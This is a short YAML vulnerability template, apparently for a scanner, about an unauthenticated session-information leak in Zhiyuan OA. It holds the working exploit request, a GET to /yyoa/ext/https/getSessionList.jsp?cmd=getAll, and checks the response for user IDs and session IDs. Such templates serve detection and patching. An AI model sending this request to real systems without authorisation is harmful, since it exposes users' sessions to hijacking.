product: 致远OA
vName: 致远OA session-leak
type: 信息泄露
vID: [ ]
level: 2
vDesc: A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint.
version: ''
note: ''
search: { }
protocol: http
link: https://www.zhihuifly.com/t/topic/3345
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /yyoa/ext/https/getSessionList.jsp?cmd=getAll
    verify:
      logic: and
      check:
        - body:
            value:
              - <usrID>
              - <sessionID>
            logic: and
        - status: 200
